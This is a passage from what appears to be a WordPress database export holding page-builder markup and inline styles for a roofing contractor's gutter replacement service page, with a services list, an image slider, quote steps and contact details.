skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":33,\"rightPadding\":35,\"rightPaddingTablet\":20,\"blockId\":\"48ae0073-510e-4c83-8809-35ac2817fe1c\"} -->\n<style type=\"text/css\"> .block-48ae0073-510e-4c83-8809-35ac2817fe1c .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-48ae0073-510e-4c83-8809-35ac2817fe1c .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-48ae0073-510e-4c83-8809-35ac2817fe1c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 35px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-48ae0073-510e-4c83-8809-35ac2817fe1c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 20px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-48ae0073-510e-4c83-8809-35ac2817fe1c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-48ae0073-510e-4c83-8809-35ac2817fe1c\" style=\"width:33%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:shortcode -->\n[footermenu menu=\"Services\"]\n<!-- /wp:shortcode --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":67,\"topPaddingMobile\":40,\"blockId\":\"8267b3f3-870f-4554-a914-4ecf959b186f\"} -->\n<style type=\"text/css\"> .block-8267b3f3-870f-4554-a914-4ecf959b186f .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-8267b3f3-870f-4554-a914-4ecf959b186f .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-8267b3f3-870f-4554-a914-4ecf959b186f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-8267b3f3-870f-4554-a914-4ecf959b186f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-8267b3f3-870f-4554-a914-4ecf959b186f .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-8267b3f3-870f-4554-a914-4ecf959b186f\" style=\"width:67%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":52,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee .responsive-heading-title-text {\n font-size: 52px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Gutter Replacement </h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:heading {\"level\":1} -->\n<h1 id=\"headline\">In need of gutter replacement in Saginaw? Our gutter replacement specialists are ready to help. Why<strong> Us?</strong></h1>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li><strong>Professional Service</strong></li><li><strong>Gutter Replacement</strong></li><li><strong>Gutter Installation</strong></li><li><strong>All Types of Gutters</strong></li><li><strong>All Material Types</strong></li><li><strong>Downspout Services</strong></li><li><strong>Gutter Covers &amp; Leaf Guards</strong></li><li><strong>High Customer Satisfaction</strong></li><li><strong>Residential and Commercial Service</strong></li></ul>\n<!-- /wp:list -->\n\n<!-- wp:skt-blocks/advance-columns {\"columns\":1,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"8c9e0ac6-d876-416a-b243-cf53e086ab36\"} -->\n<style type=\"text/css\"> .block-8c9e0ac6-d876-416a-b243-cf53e086ab36 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-8c9e0ac6-d876-416a-b243-cf53e086ab36 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8c9e0ac6-d876-416a-b243-cf53e086ab36 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8c9e0ac6-d876-416a-b243-cf53e086ab36 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-8c9e0ac6-d876-416a-b243-cf53e086ab36 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-8c9e0ac6-d876-416a-b243-cf53e086ab36 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-8c9e0ac6-d876-416a-b243-cf53e086ab36 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-8c9e0ac6-d876-416a-b243-cf53e086ab36 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-1\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":100,\"topPadding\":30,\"bottomPadding\":30,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"topPaddingMobile\":30,\"bottomPaddingMobile\":30,\"blockId\":\"d204557b-2856-4858-9f1e-44166c4c7311\"} -->\n<style type=\"text/css\"> .block-d204557b-2856-4858-9f1e-44166c4c7311 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-d204557b-2856-4858-9f1e-44166c4c7311 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-d204557b-2856-4858-9f1e-44166c4c7311 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-d204557b-2856-4858-9f1e-44166c4c7311 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d204557b-2856-4858-9f1e-44166c4c7311 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-d204557b-2856-4858-9f1e-44166c4c7311\" style=\"width:100%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":500,\"autoPlay\":true,\"autoPlaySpeed\":\"3000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#0d2e63\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"a832934f-ab08-4930-a2bd-ee3f588a4e9d\"} -->\n<style type=\"text/css\"> .block-id-a832934f-ab08-4930-a2bd-ee3f588a4e9d .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-a832934f-ab08-4930-a2bd-ee3f588a4e9d .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-a832934f-ab08-4930-a2bd-ee3f588a4e9d .skt-blocks-gallery--item figure {\n height: 480px; }\n</style><div class=\"\"><div class=\"block-id-a832934f-ab08-4930-a2bd-ee3f588a4e9d is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:500px\" data-flickity=\"{&quot;autoPlay&quot;:3000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider2/\" class=\"wp-image-34\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:paragraph -->\n<p>You’re one step away from connecting with a specialist who can complete your Gutter Replacement project.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><li>Submit one easy form.</li><li>Connect with a local specialist.</li><li>Get a quick quote.</li><li>Enjoy your completed home project.</li></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Dunrite Roofing And Siding Based in Northern Oakland County We have served Northern Oakland County and the surrounding areas for over 25 years. Quality workmanship and competitive pricing&nbsp;have led us to become a top choice when it comes to roofing and siding in southeastern Michigan.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Call (248) 393-5000</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Fill out our contact form <a href=\"https://cteisys.com/contact-layout-1/\">here.</a> We will get back with you soon.</p>\n<!-- /wp:paragraph --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Gutters','','inherit','closed','closed','','229-autosave-v1','','','2022-08-23 18:50:19','2022-08-23 18:50:19','',229,'https://cteisys.com/?p=455',0,'revision','',0),(457,1,'2022-08-23 18:57:31','2022-08-23 18:57:31','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"602ffb7e-28cc-4efb-b1a9-b82116ccde3c\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":50,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":50,\"className\":\"gb-renovation-services-single\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services-single skt-blocks-block-section-outer-wrap block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 50px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"c3da108a-9f74-4c6a-b160-7db1573b31fd\"} -->\n<style type=\"text/css\"> .block-c3da108a-9f74-4c6a-b160-7db1573b31fd .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-c3da108a-9f74-4c6a-b160-7db1573b31fd .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-c3da108a-9f74-4c6a-b160-7db1573b31fd .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-c3da108a-9f74-4c6a-b160-7db1573b31fd .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-c3da108a-9f74-4c6a-b160-7db1573b31fd .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-c3da108a-9f74-4c6a-b160-7db1573b31fd .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-c3da108a-9f74-4c6a-b160-7db1573b31fd .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-c3da108a-9f74-4c6a-b160-7db1573b31fd skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":33,\"rightPadding\":35,\"rightPaddingTablet\":20,\"blockId\":\"e200d26a-3c92-4d1c-873a-846519bc681e\"} -->\n<style type=\"text/css\"> .block-e200d26a-3c92-4d1c-873a-846519bc681e .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-e200d26a-3c92-4d1c-873a-846519bc681e .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-e200d26a-3c92-4d1c-873a-846519bc681e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 35px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-e200d26a-3c92-4d1c-873a-846519bc681e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 20px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-e200d26a-3c92-4d1c-873a-846519bc681e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-e200d26a-3c92-4d1c-873a-846519bc681e\" style=\"width:33%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:shortcode -->\n[footermenu menu=\"Services\"]\n<!-- /wp:shortcode --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":67,\"topPaddingMobile\":40,\"blockId\":\"793d8a43-7706-4aa2-ae62-65cce7fc4e0f\"} -->\n<style type=\"text/css\"> .block-793d8a43-7706-4aa2-ae62-65cce7fc4e0f .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-793d8a43-7706-4aa2-ae62-65cce7fc4e0f .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-793d8a43-7706-4aa2-ae62-65cce7fc4e0f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-793d8a43-7706-4aa2-ae62-65cce7fc4e0f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-793d8a43-7706-4aa2-ae62-65cce7fc4e0f .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-793d8a43-7706-4aa2-ae62-65cce7fc4e0f\" style=\"width:67%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"731771dc-fea2-4707-b3ae-e7328f6679c5\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":52,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-title-text {\n font-size: 52px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-731771dc-fea2-4707-b3ae-e7328f6679c5\"><h2 class=\"responsive-heading-title-text\" 